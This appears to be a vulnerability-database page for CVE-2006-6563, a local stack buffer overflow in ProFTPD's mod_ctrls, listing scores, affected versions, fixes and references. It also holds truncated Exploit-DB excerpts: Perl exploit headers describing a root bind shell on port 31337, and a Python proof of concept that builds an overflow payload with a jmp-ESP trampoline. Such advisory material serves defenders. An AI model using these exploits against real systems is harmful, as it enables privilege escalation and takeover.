CVE-2006-6563
published 2006-12-15CVE-2006-6563: Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute…
PriorityP337medium6.6CVSS 2.0
AVLACMAuSCCICAC
EXPLOIT
EPSS
2.30%
81.1th percentile
Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | proftpd-dfsg | < proftpd-dfsg 1.3.0-17 (bookworm) | proftpd-dfsg 1.3.0-17 (bookworm) |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
CVSS provenance
nvdv2.06.6MEDIUMAV:L/AC:M/Au:S/C:C/I:C/A:C
osv6.6MEDIUM
vendor_debian6.6MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-gw7g-g6w4-pgq8: Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls
ghsa_unreviewed·2022-05-01
CVE-2006-6563 [MEDIUM] GHSA-gw7g-g6w4-pgq8: Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls
Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
OSV
CVE-2006-6563: Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls
osv·2006-12-15·CVSS 6.6
CVE-2006-6563 [MEDIUM] CVE-2006-6563: Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls
Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
Debian
CVE-2006-6563: proftpd-dfsg - Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in ...
vendor_debian·2006·CVSS 6.6
CVE-2006-6563 [MEDIUM] CVE-2006-6563: proftpd-dfsg - Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in ...
Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
Scope: local
bookworm: resolved (fixed in 1.3.0-17)
bullseye: resolved (fixed in 1.3.0-17)
forky: resolved (fixed in 1.3.0-17)
sid: resolved (fixed in 1.3.0-17)
trixie: resolved (fixed in 1.3.0-17)
No detection rules found.
Exploit-DB
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)
exploitdb·2007-02-19
CVE-2006-6563 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)
---
#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_26.pl, v1.1 2007/02/18 19:30:25 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
#
# Original Advisory :
# http://www.coresecurity.com/?action=item&id=1594
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.6 exploitation against gcc 4.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a as payload since a normal (setuid + execve) seems that doesn't work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0a on Ubuntu 6.10 compiled with gcc 4.1.2
# - ProFTPD 1.3.0/1.3.
Exploit-DB
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)
exploitdb·2007-02-18
CVE-2006-6563 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)
---
#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_24.pl, v1.0 2007/02/18 19:24:22 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
# [Old style school sploit against gcc 3.x and linux kernel 2.4]
#
# Original Advisory :
# http://www.coresecurity.com/?action=item&id=1594
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.4 exploitation against gcc 3.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a as payload since a normal setuid + execve seems that doesn't work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0
Exploit-DB
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)
exploitdb·2006-12-13
CVE-2006-6563 ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)
---
# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow
import socket
import os, os.path,stat
#This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu edgy)
#
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "\0\0\x0a\xff"
trampoline = "\x77\xe7\xff\xff" # jmp ESP on vdso
shellcode = "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" # inocuous "int 3"
#Build Payload. The format on the stack is:
#
#AAAA = EBX BBBB = ESI CCCC = EDI DDDD = EBP EEEE = EIP
payload = ("A"*512) + canary + "AAAABBBBCCCCDDDD" + trampoline + shellcode
#Setup socket
#
if os.path.exists(mySocket):
os.remove(mySocket)
s = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM)
s.bind(mySocket)
os.
Exploit-DB
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow
exploitdb·2004-08-13
CVE-2006-6563 ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow
---
/*
* This is simple local exploit (Proof of Concept?) for local bug in ProFTPd
* not in default options (must be configured with option --enable-ctrls).
* Bug exist in func
tion pr_ctrls_connect() in file "src/ctrls.c", look:
*
* "src/ctrls.c"
* int pr_ctrls_connect(const char *socket_file) {
* ...
* struct sockaddr_un cl_sock, ctrl_sock;
*
* ...
* ...
* memset(&ctrl_sock, 0, sizeof(ctrl_sock));
* ...
* ...
* strncpy(ctrl_sock.sun_path, socket_file, strlen(socket_file));
* ...
* ...
* }
*
* How we can saw there is bad call for function strncpy(). Now look here
* how look structure sockaddr_un:
*
* "/usr/include/X11/Xos.h"
* ...
* ...
* #define X_NO_SYS_UN 1
*
* struct sockaddr_un {
* short sun_family;
* char sun_path[108];
* };
*
arXiv
ShadowBound: Efficient Heap Memory Protection Through Advanced Metadata Management and Customized Compiler Optimization
arxiv_fulltext·2024-09-23
ShadowBound: Efficient Heap Memory Protection Through Advanced Metadata Management and Customized Compiler Optimization
ShadowBound
[1]blue#1
: Efficient Heap Memory Protection Through Advanced Metadata Management and Customized Compiler Optimization -10pt
Zheng Yu
Northwestern University
Ganxiang Yang
Northwestern University
Xinyu Xing
Northwestern University
### Abstract
In software development, the prevalence of unsafe languages such as C and C++ introduces potential vulnerabilities, especially within the heap, a pivotal component for dynamic memory allocation. Despite its significance, heap management complexities have made heap corruption pervasive, posing severe threats to system security. While prior solutions aiming for temporal and spatial memory safety exhibit overheads deemed impractical, we present , a unique heap memory protection design. At its core, is an efficient out-of-bounds defe
Bugzilla
CVE-2006-6563: proftpd < 1.3.1rc1 mod_ctrls buffer overflow
bugzilla·2006-12-17·CVSS 6.6
CVE-2006-6563 [MEDIUM] CVE-2006-6563: proftpd < 1.3.1rc1 mod_ctrls buffer overflow
CVE-2006-6563: proftpd < 1.3.1rc1 mod_ctrls buffer overflow
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-6563
"Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in
the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute
arbitrary code via a large reqarglen length value."
All FC-3+ releases possibly affected.
Discussion:
It seems like the 1.3.0 + patches from devel, FC-6 and FC-5 might not be
affected. Still, I'd like to try this release candidate and eventually deploy
it, but it fails to build on FC-6 with errors very early in the buils... *sigh*
I'll have a look at it when I have time, and make it high priority if anyone
confirms that the current builds are vulnerable.
---
1.3.1rc1 builds for me on fc6
Configured as
./configure --l
http://secunia.com/advisories/23371http://secunia.com/advisories/23392http://secunia.com/advisories/23473http://secunia.com/advisories/24163http://security.gentoo.org/glsa/glsa-200702-02.xmlhttp://www.coresecurity.com/?module=ContentMod&action=item&id=1594http://www.mandriva.com/security/advisories?name=MDKSA-2006:232http://www.openpkg.com/security/advisories/OpenPKG-SA-2006.039.htmlhttp://www.proftpd.org/docs/NEWS-1.3.1rc1http://www.securityfocus.com/archive/1/454320/100/0/threadedhttp://www.securityfocus.com/archive/1/460648/100/0/threadedhttp://www.securityfocus.com/archive/1/460756/100/0/threadedhttp://www.securityfocus.com/bid/21587http://www.trustix.org/errata/2006/0074/http://www.vupen.com/english/advisories/2006/4998https://exchange.xforce.ibmcloud.com/vulnerabilities/30906https://www.exploit-db.com/exploits/3330http://secunia.com/advisories/23371http://secunia.com/advisories/23392http://secunia.com/advisories/23473http://secunia.com/advisories/24163http://security.gentoo.org/glsa/glsa-200702-02.xmlhttp://www.coresecurity.com/?module=ContentMod&action=item&id=1594http://www.mandriva.com/security/advisories?name=MDKSA-2006:232http://www.openpkg.com/security/advisories/OpenPKG-SA-2006.039.htmlhttp://www.proftpd.org/docs/NEWS-1.3.1rc1http://www.securityfocus.com/archive/1/454320/100/0/threadedhttp://www.securityfocus.com/archive/1/460648/100/0/threadedhttp://www.securityfocus.com/archive/1/460756/100/0/threadedhttp://www.securityfocus.com/bid/21587http://www.trustix.org/errata/2006/0074/http://www.vupen.com/english/advisories/2006/4998https://exchange.xforce.ibmcloud.com/vulnerabilities/30906https://www.exploit-db.com/exploits/3330
2006-12-15
Published